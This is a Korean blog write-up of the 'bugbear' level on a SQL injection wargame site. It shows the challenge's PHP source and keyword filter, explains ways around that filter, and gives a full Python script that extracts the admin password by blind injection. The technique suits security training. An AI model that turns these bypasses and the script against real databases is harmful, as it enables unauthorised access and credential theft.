[LOS] 13번 bugbear 풀이
2019. 8. 7. 00:22ㆍ문제풀이/los.rubiya.kr
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe");
$query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear");
highlight_file(__FILE__);
?>
금지단어는 prob _ . () ' substr ascii = or and (공백) like 0x 다.
그 외는 저번 문제(darkknight)와 같다.
저번 문제에서는 아래와 같은 꼴로 만들어 주었다.
no=0 or id like 0x61646d696e and mid(pw,1,1)>0x64
or과 and는 ||와 %26%26으로 대체하고, like는 in으로 대체하며, 공백은 %09(tab)으로 대체하거나 공백이 필요없게 괄호로 묶어주면 된다.
0x64는 대신에 char(100)을 쓸 수 있다.(hex -> dec)
또, 글자를 비교할 땐 0x 대신 hex()를 쓸 수 있다.
힌트는 이정도..?
또 코드를 돌려주자.
정답은 52dc3991~
...더보기
import urllib.request
url = 'https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php'
headers = {}
headers['cookie']=" "
headers['User-Agent']="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
#length
def find_leth():
leth = 1
while(1):
lth_url = "?no=0||(id)in(char(97,100,109,105,110))%26%26length(pw)<"+str(leth)
req = urllib.request.Request(url+lth_url, headers=headers)
data = urllib.request.urlopen(req).read().decode('utf-8')
if(data.find("Hello admin")==-1):
leth+=1
else:
print(f'leth={leth-1}')
return (leth-1)
def bin_search_num(i):
front = 0
end = 9
while(front<=end):
mid = int((front+end)/2)
pw_mid = "?no=0||(id)in(char(97,100,109,105,110))%26%26mid(pw,"+str(i)+",1)>"+str(mid)
pw_mid1 = "?no=0||(id)in(char(97,100,109,105,110))%26%26mid(pw,"+str(i)+",1)>"+str(mid+1)
req = urllib.request.Request(url+pw_mid, headers=headers)
data = urllib.request.urlopen(req).read().decode('utf-8')
req1 = urllib.request.Request(url+pw_mid1, headers=headers)
data1 = urllib.request.urlopen(req1).read().decode('utf-8')
if((data.find("Hello admin")!=-1) and (data1.find("Hello admin")==-1)):
print(f'{i}th key: {mid+1}')
return str(mid+1)
elif((data.find("Hello admin")!=-1) and (data1.find("Hello admin")!=-1)):
#print(f'1 - i:{i}, front:{front}, end:{end}')
front = mid+1
continue
elif((data.find("Hello admin")==-1) and (data1.find("Hello admin")==-1)):
#print(f'2 - i:{i}, front:{front}, end:{end}')
end = mid-1
continue
def bin_search_ascii(i):
front = 58
end = 126
while(front<=end):
mid = int((front+end)/2)
pw_mid = "?no=0||(id)in(char(97,100,109,105,110))%26%26hex(mid(pw,"+str(i)+",1))>hex("+str(mid)+")"
pw_mid1 = "?no=0||(id)in(char(97,100,109,105,110))%26%26hex(mid(pw,"+str(i)+",1))>hex("+str(mid+1)+")"
req = urllib.request.Request(url+pw_mid, headers=headers)
data = urllib.request.urlopen(req).read().decode('utf-8')
req1 = urllib.request.Request(url+pw_mid1, headers=headers)
data1 = urllib.request.urlopen(req1).read().decode('utf-8')
if((data.find("Hello admin")!=-1) and (data1.find("Hello admin")==-1)):
print(f'{i}th key: {chr(mid+1)}')
return chr(mid+1)
elif((data.find("Hello admin")!=-1) and (data1.find("Hello admin")!=-1)):
#print(f'ascii 1 - i:{i}, front:{front}, end:{end}')
front = mid+1
continue
elif((data.find("Hello admin")==-1) and (data1.find("Hello admin")==-1)):
#print(f'ascii 2 - i:{i}, front:{front}, end:{end}')
end = mid-1
continue
if __name__ == '__main__':
leth = find_leth()
ans = []
for i in range(1,leth+1):
ans.append(bin_search_num(i))
if (ans[i-1]==None):
ans[i-1] = bin_search_ascii(i)
if(ans[i-1]==None):
print(f'{i}th key: 0')
ans[i-1] = '0'
print('password is '+''.join(ans))
'문제풀이 > los.rubiya.kr' 카테고리의 다른 글
[LOS] 15번 assassin 풀이 (0) | 2019.08.07 |
---|---|
[LOS] 14번 giant 풀이 (0) | 2019.08.07 |
[LOS] 12번 darkknight 풀이 (0) | 2019.08.06 |
[LOS] 11번 Golem 풀이 (0) | 2019.08.06 |
[LOS] 10번 skeleton 풀이 (0) | 2019.07.31 |